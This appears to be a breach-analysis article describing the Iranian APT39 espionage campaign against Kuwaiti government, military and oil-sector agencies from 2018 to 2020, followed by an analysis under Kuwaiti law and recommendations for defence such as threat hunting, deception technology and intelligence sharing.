Between 2018 and 2020, the Iranian state-sponsored threat actor known as APT39 - also tracked as Chafer or Remix Kitten by different threat intelligence providers - conducted a sustained, multi-year cyber espionage campaign against Kuwaiti government agencies, targeting diplomatic communications, military intelligence, and sensitive oil sector operational data.
Bitdefender Labs published a detailed technical analysis of the campaign, documenting the custom toolsets and living-off-the-land techniques employed by the group to maintain persistent, stealthy access to high-value Kuwaiti government networks over an extended period.
Key Facts
- WhatIranian APT39 conducted multi-year cyber espionage against Kuwait (2018-2020).
- WhoKuwaiti government diplomatic, military, and oil sector agencies.
- Data ExposedDiplomatic cables, military intelligence, and oil sector operational data.
- OutcomeTwo-year undetected dwell time; discovered by Bitdefender, not Kuwait.
What Was Exposed
- Diplomatic communications from Kuwaiti government agencies, potentially including negotiating positions, foreign policy assessments, and classified diplomatic cables
- Military intelligence data, including potentially operational planning documents, order of battle information, and assessments of regional military capabilities
- Kuwait Petroleum Corporation and oil sector operational data, including production figures, infrastructure assessments, and commercial negotiations
- Personnel records of government officials, military officers, and intelligence personnel, enabling targeting for future social engineering or physical surveillance
- Internal government network architecture and authentication credential stores, providing persistent access paths and enabling future re-entry
- Communications metadata revealing the organisational structure of targeted agencies, the identity of key officials, and the patterns of inter-agency communication
- Classified assessments of Kuwait’s relationships with coalition partners, potentially including information on intelligence sharing arrangements
- Data on Kuwait’s US military basing arrangements and the operational details of coalition force presence at Kuwaiti bases
APT39 is assessed by multiple intelligence agencies and private threat intelligence firms to operate as an extension of Iranian state intelligence, specifically the Ministry of Intelligence and Security (MOIS). The group’s primary mission is the collection of intelligence in support of Iranian geopolitical objectives - tracking dissidents and opposition figures, gathering intelligence on regional adversaries, and monitoring the activities of foreign governments whose decisions affect Iranian interests.
Kuwait sits at the intersection of several Iranian intelligence priorities: it hosts significant US military infrastructure (Ali Al Salem Air Base and Camp Arifjan), maintains close relationships with Saudi Arabia that create strategic intelligence value, and has historically served as a mediator in regional disputes where Iranian interests are at stake.
The technical profile of APT39’s operations, as documented by Bitdefender and corroborated by MITRE ATT&CK’s APT39 profile, is characterized by a preference for custom-developed tools over commodity malware. The group’s toolkit includes SEAWEED (a backdoor capable of file upload/download, command execution, and screenshot capture), CACHEMONEY (a persistence mechanism exploiting Windows registry run keys), and POWBAT (a PowerShell-based backdoor enabling remote command execution).
These custom tools enable APT39 to evade signature-based detection tools that rely on known malware hashes, requiring behavioral detection capabilities that were not universally deployed across Kuwait’s government network at the time of the campaign.
Living-off-the-land (LotL) techniques were central to APT39’s operational security during the Kuwait campaign. By leveraging legitimate Windows administrative tools
- PowerShell, Windows Management Instrumentation, Remote Desktop Protocol, and the Sysinternals suite - for lateral movement, credential harvesting, and data collection, the group minimized the generation of artifacts that would distinguish their activity from legitimate administrative operations. This approach is particularly effective in government environments where system administrators routinely use these same tools for legitimate purposes, making behavioral detection significantly more challenging than in environments where these tools are rarely or never legitimately used.
The dwell time of the APT39 campaign in Kuwait - at least two years - is a critical indicator of the detection failure that enabled the damage. Extended dwell times are characteristic of state-sponsored espionage operations precisely because they prioritize intelligence collection over operational disruption. Unlike ransomware operators who must eventually reveal their presence to collect payment, espionage actors benefit from remaining undetected indefinitely, continuously exfiltrating intelligence while avoiding any action that might trigger an incident response investigation.
Two years of undetected access to Kuwaiti government networks represents an intelligence windfall for Iranian state interests, potentially enabling them to anticipate Kuwaiti diplomatic positions, understand Kuwaiti military capabilities, and track Kuwaiti intelligence relationships with coalition partners.
The geopolitical context of 2018-2020 makes the intelligence value of this campaign particularly significant.
This period encompassed the escalating tensions following the US withdrawal from the Joint Comprehensive Plan of Action (JCPOA) in May 2018, the subsequent maximum-pressure sanctions campaign, the Gulf crisis that saw Qatar blockaded by Saudi Arabia, the UAE, Bahrain, and Egypt, and the assassination of IRGC Commander Qasem Soleimani in January 2020. Kuwait’s role as a mediator during the Qatar crisis, combined with its hosting of US military forces and its close relationship with Saudi Arabia, made its government communications extraordinarily valuable to Iranian intelligence analysts trying to understand the evolving Gulf political landscape.
The oil sector targeting in the APT39 campaign reflects a consistent priority across multiple Iranian state-sponsored cyber operations. Kuwait’s oil sector - centered on the Kuwait Petroleum Corporation (KPC), one of the world’s largest vertically integrated oil companies - holds commercial intelligence of enormous value to Iranian oil ministry officials seeking to understand competitor production strategies, pricing positions, and OPEC quota compliance.
Exfiltrating KPC operational data provides Iran with intelligence that is directly valuable both for energy policy purposes and as a source of commercial advantage in international oil markets where Kuwait and Iran compete for customers and market share.
Regulatory Analysis
The APT39 campaign against Kuwait’s government agencies presents a fundamentally different regulatory challenge than the commercial ransomware incidents that represent most of Kuwait’s publicized data breach history. Nation-state espionage operations do not fit neatly within the data protection regulatory framework established by CITRA’s DPPR Decision No. 26/2024 or the Cybercrime Law No. 63/2015. Nevertheless, the regulatory analysis reveals important structural insights about Kuwait’s cyber governance framework.
The Cybercrime Law No. 63/2015 clearly criminalizes the unauthorized access and data interception that constitute APT39’s core activities. Articles establishing offenses for unauthorized system access, data interception, and electronic surveillance apply directly to the technical actions performed by APT39 operators within Kuwaiti government networks.
However, the practical enforcement of these provisions against state-sponsored actors operating from Iranian territory is constrained by the absence of mutual legal assistance arrangements and the diplomatic impossibility of extradition for individuals acting under the direction of a foreign state intelligence service.
The DPPR Decision No. 26/2024’s breach notification requirements create obligations for the Kuwaiti government agencies that were compromised, irrespective of the state-sponsored nature of the attacker. Where government agencies process personal data of Kuwaiti citizens
- and the diplomatic and military agencies targeted by APT39 certainly do - a compromise that provides unauthorized access to that data constitutes a personal data breach requiring notification to CITRA within 72 hours of discovery. The national security sensitivity of the specific data exposed may justify limitations on the public elements of the notification, but does not eliminate the obligation to notify the regulator.
Kuwait’s regulatory framework lacks a dedicated national security cyber incident reporting mechanism comparable to the classified incident reporting requirements that exist in the United States under Executive Order 14028 or the UK’s National Cyber Security Centre mandatory reporting scheme for government agencies.
The absence of such a mechanism means that there is no regulatory basis for compelling government agencies to report state-sponsored intrusions to a central coordinating authority, limiting the government’s ability to develop a comprehensive picture of Iranian APT activity across Kuwait’s government network and to coordinate defensive responses.
The two-year dwell time of the APT39 campaign raises questions about the adequacy of the security measures in place at the targeted Kuwaiti government agencies. CITRA’s DPPR and the broader data protection framework impose obligations on data controllers to implement appropriate technical and organizational measures to protect personal data.
For government agencies handling classified diplomatic and military data, the standard of appropriate measures must be calibrated to the threat landscape - which includes state-sponsored espionage as a foreseeable and documented risk. Security measures that fail to detect a sophisticated intrusion for two years do not meet any reasonable definition of appropriate for data of this sensitivity.
What Should Have Been Done
Defending against a sophisticated, patient state-sponsored espionage actor like APT39 requires a fundamentally different security philosophy than defending against opportunistic criminal ransomware operators. The assumption must be that the adversary is already inside the network and has been for an extended period. The defensive objective is therefore not to prevent initial access but to minimize the attacker’s ability to collect and exfiltrate valuable intelligence while maximizing the defender’s ability to detect the intrusion and identify the full scope of compromise.
Data minimization and compartmentalization are the most effective strategic defenses against sustained espionage. Kuwait’s government agencies should implement strict need-to-know access controls that limit each user’s ability to access sensitive data to only what is directly required for their current official function. Classification systems should enforce technical access controls, not merely advisory labels, ensuring that accessing above-classification data requires explicit authorization that is logged and monitored in real time.
An espionage actor who gains initial access through a low-privilege employee account should be immediately confined to a limited data universe by technical access controls, rather than being able to escalate privileges and access the full range of sensitive government data.
Threat hunting, rather than reactive incident response, is the appropriate detection strategy for nation-state espionage. Threat hunters proactively search network and endpoint telemetry for indicators of compromise (IOCs) and behavioral patterns associated with known adversary TTPs, rather than waiting for security tools to generate alerts on detected threats. APT39’s TTPs are extensively documented in MITRE ATT&CK and in Bitdefender’s published analysis; Kuwait’s government agencies should have been conducting regular threat hunts using APT39’s known indicators and behavioral signatures.
A structured threat hunting programme, conducted monthly or more frequently for high-risk agencies, would significantly reduce the probability of a two-year undetected dwell time.
Deception technology - honeypots, honeytokens, and canary credentials - represents a particularly effective tool against espionage actors who must access data to achieve their mission. Deploying realistic fake credentials, documents, and network services that appear to be high-value intelligence targets will attract an actor like APT39 that is actively seeking to identify and access sensitive data.
Any interaction with deception assets generates an immediate, high-confidence alert that a sophisticated actor is present in the network, enabling rapid incident response before the actor has accessed genuine sensitive data. Deception technology is particularly effective against LotL attackers who appear to be legitimate users - the deception environment distinguishes between the system administrator who legitimately accesses a file server and the espionage actor who accesses a fake file server that no legitimate user should ever touch.
Kuwait should establish a national threat intelligence sharing mechanism that enables government agencies to share IOCs and adversary TTPs bilaterally, without requiring public disclosure that could compromise ongoing investigations or reveal classified capabilities. The discovery of APT39 activity in Kuwaiti government networks by a private sector cybersecurity firm, rather than by Kuwait’s own intelligence and cybersecurity apparatus, suggests that the government’s threat intelligence collection and sharing mechanisms were not functioning effectively.
A national cyber intelligence fusion center, operating under CITRA or the national security apparatus, would provide the coordination mechanism needed to ensure that indicators discovered in one government agency are immediately shared across all agencies as defensive signatures.
Diplomatic and intelligence liaison relationships with Gulf Cooperation Council partners, the United States, and the United Kingdom provide access to classified threat intelligence about Iranian APT operations that is not available through commercial channels. Kuwait should leverage these relationships to ensure that its government cybersecurity teams have access to the full classified picture of APT39’s capabilities and TTPs, enabling proactive defensive measures before publicly disclosed IOCs have been incorporated into commercial threat intelligence feeds.
The US Cyber Command and CISA regularly share classified threat intelligence with allied government CERT teams; Kuwait should formalize these information-sharing arrangements to ensure that CERT-KW operates with the most current and complete intelligence picture available.
Two years of undetected Iranian espionage inside Kuwait’s government networks is not primarily a technology failure - it is a strategic failure to invest in the threat hunting, intelligence sharing, and detection capabilities proportionate to Kuwait’s geopolitical exposure as a Gulf state hosting US military forces and serving as a regional diplomatic mediator. The intelligence already lost cannot be recovered; the priority is ensuring that future Iranian APT activity is detected in days, not years.